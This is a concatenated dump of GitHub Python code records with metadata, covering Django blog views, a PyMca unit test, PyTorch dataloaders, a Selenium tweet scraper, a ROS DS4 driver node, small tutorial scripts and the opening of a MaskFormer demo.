\tdef deploydlc(self):\r\n\t\t\r\n\t\ts6=subcontent.subwindow()\r\n\t\ts6.pool.close()\r\n\t\ts6.pool.join()\r\n\r\n\r\n","repo_name":"iridium-soda/Software-Security-Course-Design","sub_path":"Source/window.py","file_name":"window.py","file_ext":"py","file_size_in_byte":2360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"3680052491","text":"from datetime import datetime\nfrom django.core.paginator import Paginator\nfrom django.shortcuts import render, get_object_or_404, redirect\nfrom django.http import HttpResponse\nfrom django.views import View\nfrom .models import *\nfrom .forms import CommentForm\n\n\"\"\"Here we describe the application logic that runs when a request comes in\"\"\"\n\n\ndef my_paginator(request, all_posts, number_posts=8):\n    paginator = Paginator(all_posts, number_posts) # create a Paginator object so each page holds number_posts posts\n    page_number = request.GET.get('page')\n    page_obj = paginator.get_page(page_number)\n    return page_obj\n\n\nclass PostListView(View):\n    \"\"\"Lists articles by category, by tag, and on the home page\"\"\"\n\n    # def my_paginator(self,request, all_posts, number_posts=8):\n    #     paginator = Paginator(all_posts, number_posts) # create a paginator object so one page holds 4 posts\n    #     page_number = request.GET.get('page')\n    #     page_obj = paginator.get_page(page_number)\n    #     return page_obj\n\n    def get_queryset(self):\n        return Post.objects.filter(published_date__lte=datetime.now(), published=True)\n\n    def get(self, request, category_slug=None, slug=None):\n        \"\"\"A rather clever ORM query: on the queryset of post objects we set a filter\n        so that the category slug inside the post object matches the slug from the URL route\"\"\"\n        \"\"\"The double underscore is a lookup across the relation\"\"\"\n        tags = Tag.objects.all()\n        template = 'blog/index.html' # default template\n        if category_slug is not None: # a category name came in with the request\n            all_posts = self.get_queryset().filter(category__slug=category_slug, category__published=True)# filter by category\n            page_obj = my_paginator(request, all_posts)\n        elif slug is not None: # a tag name came in with the request\n            all_posts = self.get_queryset().filter(tags__slug=slug) # filter by tag\n            page_obj = my_paginator(request, all_posts)\n        else: # home page: neither a category nor a tag was requested, so show everything published\n            all_posts = self.get_queryset()\n            page_obj = my_paginator(request, all_posts)\n        return render(request, template, {\n            'page_obj': page_obj,\n            \"tags\": tags\n        })\n\n\nclass PostDetailView(View):\n    \"\"\"The view that opens a full article\"\"\"\n\n    def get(self, request, **kwargs):\n        \"\"\"Describe what the get method does\"\"\"\n\n        post = get_object_or_404(Post, slug=kwargs.get(\"slug\"))\n        comment_all = post.comments.all()\n        page_obj = my_paginator(request, comment_all, 6) # show only 6 comments per page\n        tags = Tag.objects.all()\n        form = CommentForm()\n        return render(request, post.template,\n                      { \"post\": post,\n                          \"form\": form,\n                          \"tags\": tags,\n                          \"page_obj\": page_obj,\n                      }\n                      )\n\n\n    def post(self, request, **kwargs):\n        # Comment.objects.create( # first way to create an object and write it to the database\n        #     author=request.user,\n        #     post_id=request.POST.get(\"post\"),\n        #     text=request.POST.get(\"text\")\n        # )\n        # comment = Comment() # second way to write data to the database\n        # comment.author = request.user\n        # comment.post_id = request.POST.get(\"post\")\n        # comment.text = request.POST.get(\"text\")\n        # comment.save()\n        print(request.POST)\n        print(kwargs)\n        form = CommentForm(request.POST) # an object is created with the data bound for the DB\n        if form.is_valid(): # if the submitted data is valid\n            form = 
form.save(commit=False)\n form.post = Post.objects.get(slug=kwargs.get(\"slug\"))\n form.author = request.user\n form.save()\n return redirect(request.path)\n\n","repo_name":"RihardXXX/shop","sub_path":"blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4397,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"18049120671","text":"__author__ = \"V. Armando Sole\"\n__contact__ = \"sole@esrf.fr\"\n__license__ = \"MIT\"\n__copyright__ = \"European Synchrotron Radiation Facility, Grenoble, France\"\nimport unittest\nimport sys\nimport os\nimport gc\nimport tempfile\n\nclass testSpecfilewrapper(unittest.TestCase):\n def setUp(self):\n \"\"\"\n import the module\n \"\"\"\n try:\n from PyMca5.PyMcaIO import specfilewrapper as specfile\n self.specfileClass = specfile\n except Exception:\n self.specfileClass = None\n if self.specfileClass is not None:\n text = \"1.3 1 1\\n\"\n text += \"2.5 4 8\\n\"\n text += \"3.7 9 27\\n\"\n text += \"\\n\"\n tmpFile = tempfile.mkstemp(text=False)\n if sys.version < '3.0':\n os.write(tmpFile[0], text)\n else:\n os.write(tmpFile[0], bytes(text, 'utf-8'))\n os.close(tmpFile[0])\n self.fname = tmpFile[1]\n\n def tearDown(self):\n \"\"\"clean up any possible files\"\"\"\n # make sure the file handle is free\n self._sf = None\n self._scan = None\n # this should free the handle\n gc.collect()\n if self.specfileClass is not None:\n if os.path.exists(self.fname):\n os.remove(self.fname)\n\n def testSpecfilewrapperImport(self):\n #\"\"\"Test successful import\"\"\"\n self.assertTrue(self.specfileClass is not None,\n 'Unsuccessful PyMca5.PyMcaIO.specfilewrapper import')\n\n def testSpecfilewrapperReading(self):\n #\"\"\"Test specfile readout\"\"\"\n self.testSpecfilewrapperImport()\n self._sf = self.specfileClass.Specfile(self.fname)\n # test the number of found scans\n self.assertEqual(len(self._sf), 2,\n 'Expected to read 2 scans, read %s' %\\\n len(self._sf))\n self.assertEqual(self._sf.scanno(), 2,\n 'Expected to read 2 scans, got %s' %\\\n self._sf.scanno())\n # test scan iteration selection method\n self._scan = self._sf[0]\n labels = self._scan.alllabels()\n expectedLabels = ['Point', 'Column 0', 'Column 1', 'Column 2']\n self.assertEqual(len(labels), 4,\n 'Expected to read 4 labels, got %s' % len(labels))\n for i in range(3):\n self.assertEqual(labels[i], expectedLabels[i],\n 'Read \"%s\" instead of \"%s\"' %\\\n (labels[i], expectedLabels[i]))\n\n # test scan number selection method\n self._scan = self._sf.select('1.1')\n labels = self._scan.alllabels()\n expectedLabels = ['Point', 'Column 0', 'Column 1', 'Column 2']\n self.assertEqual(len(labels), 4,\n 'Expected to read 4 labels, got %s' % len(labels))\n for i in range(3):\n self.assertEqual(labels[i], expectedLabels[i],\n 'Read \"%s\" instead of \"%s\"' %\\\n (labels[i], expectedLabels[i]))\n\n # test scan number of mca\n self._scan = self._sf[0]\n nbmca = self._scan.nbmca()\n self.assertEqual(nbmca, 0,\n 'Expected to read 0 mca, got %s' % nbmca)\n\n self._scan = self._sf[1]\n nbmca = self._scan.nbmca()\n self.assertEqual(nbmca, 3,\n 'Expected to read 3 mca, got %s' % nbmca)\n\n def testSpecfilewrapperReadingCompatibleWithUserLocale(self):\n #\"\"\"Test specfile compatible with C locale\"\"\"\n self.testSpecfilewrapperImport()\n self._sf = self.specfileClass.Specfile(self.fname)\n self._scan = self._sf[0]\n datacol = self._scan.datacol(2)\n data = self._scan.data()\n self._sf = None\n self.assertEqual(datacol[0], 1.3,\n 'Read %f 
instead of %f' %\\\n (datacol[0], 1.3))\n self.assertEqual(datacol[1], 2.5,\n 'Read %f instead of %f' %\\\n (datacol[1], 2.5))\n self.assertEqual(datacol[2], 3.7,\n 'Read %f instead of %f' %\\\n (datacol[2], 3.7))\n self.assertEqual(datacol[1], data[1][1],\n 'Read %f instead of %f' %\\\n (datacol[1], data[1][1]))\n gc.collect()\n\n def testTrainingSpectrumReading(self):\n from PyMca5 import PyMcaDataDir\n import numpy\n fname = os.path.join(PyMcaDataDir.PYMCA_DATA_DIR,\n 'XRFSpectrum.mca')\n self._sf = self.specfileClass.Specfile(fname)\n self._scan = self._sf[0]\n\n # I find awful that starts counting at 1\n # 1 is the point number\n # 2 is the actual spectal data\n datacol = self._scan.datacol(2)\n self._scan = self._sf[1]\n\n # The \"second\" scan is the readout as mca\n mca = self._scan.mca(1)\n self.assertTrue(numpy.all(datacol == mca))\n\ndef getSuite(auto=True):\n testSuite = unittest.TestSuite()\n if auto:\n testSuite.addTest(\\\n unittest.TestLoader().loadTestsFromTestCase(testSpecfilewrapper))\n else:\n # use a predefined order\n testSuite.addTest(testSpecfilewrapper(\"testSpecfilewrapperImport\"))\n testSuite.addTest(testSpecfilewrapper(\"testSpecfilewrapperReading\"))\n testSuite.addTest(\\\n testSpecfilewrapper(\\\n \"testSpecfilewrapperReadingCompatibleWithUserLocale\"))\n testSuite.addTest(testSpecfilewrapper(\"testTrainingSpectrumReading\"))\n return testSuite\n\ndef test(auto=False):\n unittest.TextTestRunner(verbosity=2).run(getSuite(auto=auto))\n\nif __name__ == '__main__':\n test()\n","repo_name":"vasole/pymca","sub_path":"PyMca5/tests/specfilewrapperTest.py","file_name":"specfilewrapperTest.py","file_ext":"py","file_size_in_byte":5688,"program_lang":"python","lang":"en","doc_type":"code","stars":54,"dataset":"github-code","pt":"35"} +{"seq_id":"37929151440","text":"# tensordata.py\n\nimport torch as th\nimport numpy as np\n\n\n# -------------------------------------------------------------------------\n# Tensor Dataset \n# -------------------------------------------------------------------------\n\n\nclass TDataset:\n \n def __init__ (self, x, y):\n \n if x.shape[0] != y.shape[0]:\n raise Exception(\"x.shape[0] == y.shape[0] must be True\")\n if x.device != y.device:\n raise Exception(\"x.device == y.device must be True\")\n self.x = x\n self.y = y\n self.length = x.shape[0]\n self.indices = None # torch tensor \n \n def __len__ (self):\n \n return self.length\n \n def __getitem__ (self, idx):\n \n if self.indices is not None: \n return self.x[self.indices[idx]], self.y[self.indices[idx]]\n else:\n return self.x[idx], self.y[idx]\n \n def subset (self, idx):\n \n sub = TDataset(self.x, self.y)\n if self.indices is not None: sub.indices = self.indices[idx]\n else: sub.indices = th.tensor(list(idx), device=self.x.device, dtype=th.long)\n sub.length = sub.indices.shape[0]\n return sub\n \n def dataloader (self, method=None, batch_size=None, drop_last=False):\n \n return TDataloader(self, method, batch_size, drop_last)\n\n def random_split (self, TR_size=0.8):\n \n TR_size = int(TR_size*len(self))\n perm = np.random.permutation(len(self)).tolist()\n TR, TS = self.subset(perm[:TR_size]), self.subset(perm[TR_size:])\n return TR, TS\n \n def __repr__ (self):\n \n return \"Tensor Dataset\"\n\n \n# -------------------------------------------------------------------------\n# Tensor Dataloader\n# -------------------------------------------------------------------------\n\n \nclass TDataloader:\n\n def __init__(self, tdataset, method=None, batch_size=None, drop_last=False):\n 
'''\n        method: None or 'shuffle' or 'bootstrap'\n        '''\n        \n        self.dataset = tdataset\n        if method not in [None, 'shuffle', 'bootstrap']:\n            raise Exception(\"method must be one of these: None, 'shuffle', 'bootstrap'\")\n        self.method = method\n        if not batch_size: batch_size = len(self.dataset)\n        self.batch_size = batch_size\n        self.drop_last = drop_last\n        n_batches, remainder = divmod(len(self.dataset), self.batch_size)\n        if not self.drop_last and remainder > 0: n_batches += 1 \n        self.n_batches = n_batches\n        self.effective_length = n_batches*batch_size\n        \n    def __len__(self):\n        \n        return self.n_batches\n    \n    def __iter__(self):\n        \n        if self.method == 'bootstrap':\n            idx = np.random.randint(0, len(self.dataset), size=self.effective_length).tolist()\n        elif self.method == 'shuffle':\n            idx = np.random.permutation(len(self.dataset)).tolist()\n        if self.method:\n            self.ready_dataset = self.dataset.subset(idx)\n        else:\n            self.ready_dataset = self.dataset\n        self.i = 0\n        return self\n\n    def __next__(self):\n        \n        if self.i >= self.effective_length: raise StopIteration\n        batch = self.ready_dataset[self.i:self.i+self.batch_size]\n        self.i += self.batch_size\n        return batch\n\n    def __repr__ (self):\n        \n        return \"Tensor Dataloader\"\n\n\n# -------------------------------------------------------------------------\n# Positive Negative Bootstrap Tensor Dataloader\n# -------------------------------------------------------------------------\n \n \nclass PosNeg_Bootstrap_TDataloader:\n    \n    def __init__ (self, tdataset, batch_size=None):\n        \n        self.Nclasses = int(tdataset.y.max().item()) + 1 \n        self.tot_length = len(tdataset)*self.Nclasses \n        self.dataset = tdataset\n        if not batch_size: batch_size = self.tot_length\n        self.batch_size = batch_size \n        n_batches, remainder = divmod(self.tot_length, self.batch_size)\n        if remainder > 0: n_batches += 1 \n        self.n_batches = n_batches\n        self.effective_length = n_batches*batch_size\n        self.device = tdataset.x.device\n        self.eye = th.eye(self.Nclasses, device=self.device)\n        self.mask = (th.ones(self.batch_size, device=self.device) > 0)\n        self.mask[:int(self.batch_size/2)] = False\n        \n    def __len__ (self):\n        \n        return self.n_batches\n    \n    def __iter__ (self):\n        \n        idx = np.random.randint(0, len(self.dataset), size=self.effective_length).tolist()\n        self.ready_dataset = self.dataset.subset(idx)\n        self.i = 0\n        return self \n\n    def __next__ (self):\n        \n        if self.i >= self.effective_length: raise StopIteration\n        x, y = self.ready_dataset[self.i:self.i+self.batch_size]\n        self.i += self.batch_size\n        \n        y = y.flatten()\n        # shuffle the half-True mask so a random ~half of the batch keeps its true label\n        stay_positive = th.randperm(self.batch_size, device=self.device)\n        stay_positive = self.mask[stay_positive]\n        # sample a wrong label uniformly: draw from {0..Nclasses-2}, then shift\n        # draws >= y up by one so the true class can never be selected\n        y_fake = th.randint(self.Nclasses-1, (y.shape[0],), device=self.device)\n        y_fake = (y_fake >= y) + y_fake\n        chosen_y = y_fake*(~stay_positive) + y*stay_positive\n        ready_x = th.cat((x, self.eye[chosen_y]), dim=1)\n        ready_y = stay_positive.float().reshape(-1, 1)\n        return ready_x, ready_y\n\n    def __repr__ (self):\n        \n        return \"Positive Negative Bootstrap Tensor Dataloader\"","repo_name":"MatteoPardi/Entropy-FFA","sub_path":"_tools/utils/tensordata.py","file_name":"tensordata.py","file_ext":"py","file_size_in_byte":5474,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
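# --- Editor's sketch (an assumption, not part of the source records): the
# --- tensordata API above would be driven roughly like this:
#     import torch as th
#     ds = TDataset(th.randn(100, 8), th.randint(0, 3, (100, 1)))
#     for xb, yb in ds.dataloader(method='shuffle', batch_size=32, drop_last=True):
#         ...  # one training step per (xb, yb) mini-batch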
+{"seq_id":"5211838026","text":"# Read this first: https://www.w3schools.com/html/default.asp\nfrom selenium import webdriver\nimport time\nimport csv\n\n\"\"\"\nA function that uses selenium and chromedriver to get tweets from a Twitter account.\nurl is the link to the account\nscrollNum is the number of times we want to scroll to load more tweets.\n\"\"\"\n\ndef getTweets(url, scrollNum):\n    #open the browser and visit the url\n    driver = webdriver.Chrome('./chromedriver')\n    driver.get(url)\n    time.sleep(2)\n\n    already_seen=set()#keeps track of tweets we have already seen.\n\n    #write the tweets to a file\n    fw=open('tweets.txt','w',encoding='utf8')\n    writer=csv.writer(fw,lineterminator='\\n')#create a csv writer for this file\n    for i in range(scrollNum):\n\n        print('batch count',i)\n        \n        #find all elements that have the value \"tweet\" for the data-testid attribute\n        tweets=driver.find_elements_by_css_selector('div[data-testid=\"tweet\"]')#\n        print(len(tweets),' tweets found\\n')\n        \n        for tweet in tweets:\n\n            if tweet in already_seen:continue #we have seen this tweet before while scrolling down, ignore\n            already_seen.add(tweet) #first time we see this tweet. Mark as seen and process.\n            \n            txt,retweets='NA','NA'\n            \n            try: \n                txt=tweet.find_element_by_css_selector(\"div.css-901oao.r-hkyrab.r-1qd0xha.r-a023e6.r-16dba41.r-ad9z0x.r-bcqeeo.r-bnwqim.r-qvutc0\").text\n                txt=txt.replace('\\n', ' ')\n            except: \n                print ('no text') \n\n            try:\n                \n                #find the div element that has the value \"retweet\" for the data-testid attribute\n                retweetElement=tweet.find_element_by_css_selector('div[data-testid=\"retweet\"]')\n                \n                #find the span element that has all the specified values (space separated) in its class attribute\n                retweets=retweetElement.find_element_by_css_selector('span.css-901oao.css-16my406.r-1qd0xha.r-ad9z0x.r-bcqeeo.r-qvutc0').text \n                \n            except:\n                print ('no retweets')\n\n            #only write tweets that have text or retweets (or both). \n            if txt!='NA' or retweets!='NA':\n                writer.writerow([txt,retweets])\n\n        #scroll down to load more tweets\n        driver.execute_script(\"window.scrollTo(0, document.body.scrollHeight);\")\n        \n        time.sleep(2)\n\n    fw.close()\n    print('done')\n\n\nurl='https://twitter.com/SHAQ'\ngetTweets(url,5)","repo_name":"MaitreyPrajapati/BIA-660","sub_path":"week6/selenium_scraper.py","file_name":"selenium_scraper.py","file_ext":"py","file_size_in_byte":2523,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"26652773659","text":"# -*- coding: utf-8 -*-\nimport pickle\n\nclass Vehiculos():\n\n    def __init__(self, marca, modelo):\n        self.marca = marca\n        self.modelo = modelo\n        self.enmarcha = False\n        self.acelera = False\n        self.frena = False\n\n    def arrancar(self):\n        self.enmarcha = True\n\n    def acelerar(self):\n        self.acelera = True\n\n    def frenar(self):\n        self.frena = True\n\n    def estado(self):\n        print(\"Make: \", self.marca, \"\\nModel: \", self.modelo, \"\\nRunning: \", self.enmarcha, \"\\nAccelerating: \", self.acelera, \"\\nBraking: \", self.frena)\n\ncoche1 = Vehiculos(\"Ford\", \"Mustang\")\ncoche2 = Vehiculos(\"Seat\", \"León\")\ncoche3 = Vehiculos(\"Mazda\", \"CX-5\")\n\ncoches = [coche1, coche2, coche3]\n\nfichero = open(\"40_vehiculos\", \"wb\")\n\npickle.dump(coches, fichero)\n\nfichero.close()\n\ndel(fichero)\n\n# Load the file back\n\nficheroApertura = open(\"40_vehiculos\", \"rb\")\n\nmisCoches = pickle.load(ficheroApertura)\n\nficheroApertura.close()\n\nfor x in misCoches:\n    print(x.estado(), \"\\n ---------- \")","repo_name":"jask05/PythonCourse","sub_path":"Ejercicios/40_serializacion_objetos_ii.py","file_name":"40_serializacion_objetos_ii.py","file_ext":"py","file_size_in_byte":1011,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
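# --- Editor's note (a sketch, not from the source repo): the pickle round-trip
# --- above is safer with context managers, which close the handles even on error:
#     with open("40_vehiculos", "wb") as f:
#         pickle.dump(coches, f)
#     with open("40_vehiculos", "rb") as f:
#         misCoches = pickle.load(f)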
+{"seq_id":"29120060374","text":"class Record(object):\n    record_list = []\n\n    def add_record(self):\n        name = input('Enter a user name:')\n        tel = input('Enter a phone number:')\n        d = {\n            'name': name,\n            'tel': tel\n        }\n        print(d)\n        self.record_list.append(d.copy())\n        print('Saved successfully')\n        # print(self.record_list)\n\n    def query_record(self):\n        name = input('Enter the user name to look up:')\n\n        for i in self.record_list:\n            if name in i.get('name'):\n                print(i)\n                break\n        else:\n            print('Contact not found')\n\n    def delete_recode(self):\n        name = input('Enter the user name to delete:')\n        for i in self.record_list:\n            if name in i.get('name'):\n                index = self.record_list.index(i)\n                self.record_list.pop(index)\n                print('User deleted successfully')\n                break\n        else:\n            print('User does not exist')\n\n    def change_record(self):\n        name = input('Enter the user name to modify:')\n        for i in self.record_list:\n            if name in i['name']:\n                tel = input('Enter the new phone number:')\n                i['tel'] = tel\n                print(i)\n                print('Updated successfully')\n                break\n\n        else:\n            print('This user does not exist')\n\n    def main(self):\n        while True:\n            print('------------ Contacts Menu ----------')\n            print('Follow the prompts')\n            print('1. Add contact')\n            print('2. Look up contact')\n            print('3. Modify contact')\n            print('4. Delete contact')\n            print('5. Press q to quit')\n            zhiling = input('Enter a command:')\n            if zhiling == '1':\n                self.add_record()\n            elif zhiling == '2':\n                self.query_record()\n            elif zhiling == '3':\n                self.change_record()\n            elif zhiling == '4':\n                self.delete_recode()\n            elif zhiling == 'q':\n                break\n            else:\n                print('Invalid command, try again')\n\n\nif __name__ == '__main__':\n    # zz = []\n    r = Record()\n    # r.add_record()\n    # print(r.record_list)\n    # print(zz)\n    # r.query_record()\n    # r.change_record()\n    # r.delete_recode()\n    r.main()\n\n\n","repo_name":"zhangjixing0809/gittest2","sub_path":"homework.py","file_name":"homework.py","file_ext":"py","file_size_in_byte":2389,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"14062645580","text":"#!/usr/bin/env python3\n\nfrom ds4_driver.logger import Logger\nfrom ds4_driver.controller_ros import ControllerRos\n\nfrom ds4drv.backends import BluetoothBackend, HidrawBackend\nfrom ds4drv.exceptions import BackendError\n\nimport rclpy\nfrom threading import Thread\n\nimport signal\nimport sys\n\n\nclass SignalHandler(object):\n    def __init__(self, controller, logger):\n        self.controller = controller\n        self._logger = logger\n\n    def __call__(self, signum, frame):\n        self._logger.info(\"Shutting down...\")\n        self.controller.exit()\n        rclpy.shutdown()\n        sys.exit(0)\n\n\ndef main():\n    rclpy.init()\n    node = rclpy.create_node(\"ds4_driver_node\")\n    node.declare_parameter(\"device_addr\", \"\")\n    node.declare_parameter(\"backend\", \"hidraw\")\n    device_addr = node.get_parameter(\"device_addr\").value\n    backend_type = node.get_parameter(\"backend\").value\n\n    logger = node.get_logger()\n\n    controller = ControllerRos(node)\n\n    sigint_handler = SignalHandler(controller, logger)\n    # Since backend.devices is a non-ROS iterator that doesn't consider\n    # rclpy.is_shutdown(), the program freezes upon receiving SIGINT when\n    # using rclpy.on_shutdown. 
Thus, we need to define our shutdown sequence\n # using signal.signal as is done in the original ds4drv script.\n signal.signal(signal.SIGINT, sigint_handler)\n\n if backend_type == \"bluetooth\":\n backend = BluetoothBackend(Logger(\"backend\"))\n else:\n backend = HidrawBackend(Logger(\"backend\"))\n\n try:\n backend.setup()\n except BackendError as err:\n logger.error(err)\n rclpy.signal_shutdown(str(err))\n sys.exit(1)\n\n spin_thread = Thread(target=rclpy.spin, args=(node,))\n spin_thread.start()\n\n for device in backend.devices:\n logger.info(\"Connected to {0}\".format(device.name))\n if device_addr in (None, \"\", device.device_addr):\n controller.setup_device(device)\n if not controller.is_alive():\n controller.start()\n controller.loop.register_event(\"device-report\", controller.cb_report)\n else:\n logger.error(\"...but it's not the one we're looking for :(\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"naoki-mizuno/ds4_driver","sub_path":"ds4_driver/nodes/ds4_driver_node.py","file_name":"ds4_driver_node.py","file_ext":"py","file_size_in_byte":2213,"program_lang":"python","lang":"en","doc_type":"code","stars":74,"dataset":"github-code","pt":"35"} +{"seq_id":"30292903150","text":"from django.forms import (\n CheckboxSelectMultiple,\n ChoiceField,\n ModelForm,\n ModelMultipleChoiceField,\n Select,\n SelectMultiple,\n TextInput,\n)\n\nfrom apps.destinacao.models import Destinacao\nfrom apps.fornecedor.models import Fornecedor\n\n\nclass FornecedorForm(ModelForm):\n TP_FORNECEDOR_CHOICES = [\n (None, \"Selecione...\"),\n (\"Resíduos\", \"Resíduos\"),\n (\"Água\", \"Água\"),\n (\"Eletricidade\", \"Eletricidade\"),\n (\"Combustível\", \"Combustível\"),\n ]\n\n tp_fornecedor = ChoiceField(\n label=\"Tipo Fornecedor\",\n choices=TP_FORNECEDOR_CHOICES,\n widget=Select(attrs={\"class\": \"form-select\"}),\n )\n\n destinacao = ModelMultipleChoiceField(\n label=\"Destinação\",\n queryset=Destinacao.objects.all(),\n widget=CheckboxSelectMultiple(attrs={\"class\": \"form-check-input mb-0\"}),\n required=False,\n )\n\n class Meta:\n model = Fornecedor\n\n fields = [\"nome\", \"tp_fornecedor\", \"destinacao\"]\n labels = {\n \"nome\": \"Nome\",\n \"tp_fornecedor\": \"Tipo Fornecedor\",\n \"destinacao\": \"Destinação\",\n }\n\n widgets = {\n \"nome\": TextInput(\n attrs={\n \"class\": \"form-control\",\n \"placeholder\": \"Nome do Fornecedor\",\n },\n ),\n }\n","repo_name":"jtsilverio/django-gestao-residuos","sub_path":"apps/fornecedor/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1376,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"18157116012","text":"import json\nimport msgpack\n\nwith open('products_65.json', 'r') as file:\n taskJSON = json.load(file)\n\nproducts = {}\n\nfor item in taskJSON:\n if item['name'] in products:\n products[item['name']].append(item['price'])\n else:\n products[item['name']] = list()\n products[item['name']].append(item['price'])\n\nproductsParams = list()\n\nfor keys in products:\n averagePrice = sum(products[keys])/len(products[keys])\n minPrice = min(products[keys])\n maxPrice = max(products[keys])\n productsParams.append({'name': keys, 'averagePrice': averagePrice, 'maxPrice': maxPrice, 'minPrice': minPrice})\n\nwith open('answer_3_var_65.json', 'w') as answer:\n json.dump(productsParams, answer)\n\n\nproductsParamsMSGPACK = msgpack.packb(productsParams)\n\nwith open('msgpack_answer_3_var_65.msgpack', 'wb') as msgpackAnswer:\n 
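    # msgpack.packb returned bytes above, hence the binary 'wb' mode on this file.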
msgpackAnswer.write(productsParamsMSGPACK)\n\n# The msgpack file is slightly smaller than the JSON one","repo_name":"VycheslavRussu/data-engineering-course","sub_path":"practical-exercise-2/task-3/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":952,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"16527775064","text":"class Counter:\n\n    \"\"\"Models a counter\"\"\"\n\n    # class variable\n    instances = 0\n    # private class attribute\n    __weight = 100\n\n    # Constructor: called automatically when an instance is created; it may take parameters.\n    # 'self' is not a Python keyword, so any other variable name would work as well.\n    def __init__(self, _value=0):\n        # Set up the counter to 0\n        print(\"Counter constructor called\")\n        Counter.instances += 1\n        self._value = _value\n\n    # Mutator method\n    def reset(self):\n        self._value = 0\n        print(self.__weight)\n\n    def increment(self, amount=1):\n        self._value += amount\n\n    def decrement(self, amount = 1):\n        self._value -= amount\n\n    def get_value(self):\n        return self._value\n\n    # override the toString method (__str__)\n    def __str__(self):\n        return str(self._value)\n\n    # override the equality method (__eq__)\n    def __eq__(self, other):\n        if self is other: return True\n        if type(self) != type(other): return False\n        return self._value == other._value\n\n\n# Inheritance: besides a plain class name, an expression is also allowed here, which is\n# useful when the base class is defined in another module: class DerivedClassName(modname.BaseClassName):\nclass MultiplyCounter(Counter):\n\n    def multiply(self, num=2):\n        self._value *= num\n\n\ndef counter_test():\n    c1 = Counter()\n    print(c1)\n    print(c1.get_value())\n    print(c1.__str__())\n    c1.increment()\n    print(c1)\n    c1.increment(5)\n    print(c1)\n    c1.reset()\n    print(c1)\n    c2 = Counter()\n    print(Counter.instances)\n    print(c1 == c2)\n    c1 = 0\n    print(c1 == c2)\n\n\n    multiply = MultiplyCounter(10)\n    print(multiply)\n    multiply.multiply()\n    print(multiply)\n\n\nif __name__ == \"__main__\":\n    counter_test()\n\n","repo_name":"z344945251/PythonDemo","sub_path":"src/main/python/com/cabbage/basic/example/class.py","file_name":"class.py","file_ext":"py","file_size_in_byte":1708,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"14651699091","text":"import argparse\nimport glob\nimport multiprocessing as mp\nimport os\n\n# fmt: off\nimport sys\nsys.path.insert(1, os.path.join(sys.path[0], '..'))\n# fmt: on\n\nimport tempfile\nimport time\nimport warnings\n\nimport cv2\nimport numpy as np\nimport tqdm\n\nfrom detectron2.config import get_cfg\nfrom detectron2.data.detection_utils import read_image\nfrom detectron2.projects.deeplab import add_deeplab_config\nfrom detectron2.utils.logger import setup_logger\n\nfrom mask_former import add_mask_former_config\nfrom predictor import VisualizationDemo\n\nfrom sklearn.manifold import TSNE\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\n\n# constants\nWINDOW_NAME = \"MaskFormer demo\"\n\nclass_names = {\n    \"pascal\": [\"aeroplane\",\n               \"bicycle\",\n               \"bird\",\n               \"boat\",\n               \"bottle\",\n               \"bus\",\n               \"car\",\n               \"cat\",\n               \"chair\",\n               \"cow\",\n               \"diningtable\",\n               \"dog\",\n               \"horse\",\n               \"motorbike\",\n               \"person\",\n               \"potted plant\",\n               \"sheep\",\n               \"sofa\",\n               \"train\",\n               \"tvmonitor\"]\n}\n\n\ndef setup_cfg(args):\n    # load config from file and command-line arguments\n    cfg = get_cfg()\n    add_deeplab_config(cfg)\n    add_mask_former_config(cfg)\n    cfg.merge_from_file(args.config_file)\n    cfg.merge_from_list(args.opts)\n    cfg.freeze()\n    return cfg\n\n\ndef get_parser():\n    parser = argparse.ArgumentParser(description=\"Detectron2 demo for builtin configs\")\n    parser.add_argument(\n        \"--config-file\",\n        default=\"configs/ade20k-150/maskformer_R50_bs16_160k.yaml\",\n        
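# the default above points at a stock MaskFormer config; pass --config-file to use another\n        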
metavar=\"FILE\",\n help=\"path to config file\",\n )\n parser.add_argument(\"--webcam\", action=\"store_true\", help=\"Take inputs from webcam.\")\n parser.add_argument(\"--video-input\", help=\"Path to video file.\")\n parser.add_argument(\n \"--input\",\n nargs=\"+\",\n help=\"A list of space separated input images; \"\n \"or a single glob pattern such as 'directory/*.jpg'\",\n )\n parser.add_argument(\n \"--output\",\n help=\"A file or directory to save output visualizations. \"\n \"If not given, will show output in an OpenCV window.\",\n )\n\n parser.add_argument(\n \"--confidence-threshold\",\n type=float,\n default=0.5,\n help=\"Minimum score for instance predictions to be shown\",\n )\n parser.add_argument(\n \"--opts\",\n help=\"Modify config options using the command-line 'KEY VALUE' pairs\",\n default=[],\n nargs=argparse.REMAINDER,\n )\n return parser\n\n\ndef test_opencv_video_format(codec, file_ext):\n with tempfile.TemporaryDirectory(prefix=\"video_format_test\") as dir:\n filename = os.path.join(dir, \"test_file\" + file_ext)\n writer = cv2.VideoWriter(\n filename=filename,\n fourcc=cv2.VideoWriter_fourcc(*codec),\n fps=float(30),\n frameSize=(10, 10),\n isColor=True,\n )\n [writer.write(np.zeros((10, 10, 3), np.uint8)) for _ in range(30)]\n writer.release()\n if os.path.isfile(filename):\n return True\n return False\n\n\nif __name__ == \"__main__\":\n mp.set_start_method(\"spawn\", force=True)\n args = get_parser().parse_args()\n \n import easydict\n \n # args = easydict.EasyDict({\n # \"config_file\": \"./configs/pascal_voc/zegformer_R101_bs32_30k_vit16_voc_gzss_eval.yaml\",\n # \"input\": [\"/mnt/server14_hard1/msson/datasets/zs3_datasets/VOCZERO/images/val/*.jpg\"],\n # \"opts\": [\"MODEL.WEIGHTS\",\"./trained/given/zegformer_R101_bs32_10k_vit16_voc.pth\"],\n # \"output\": None\n # })\n \n 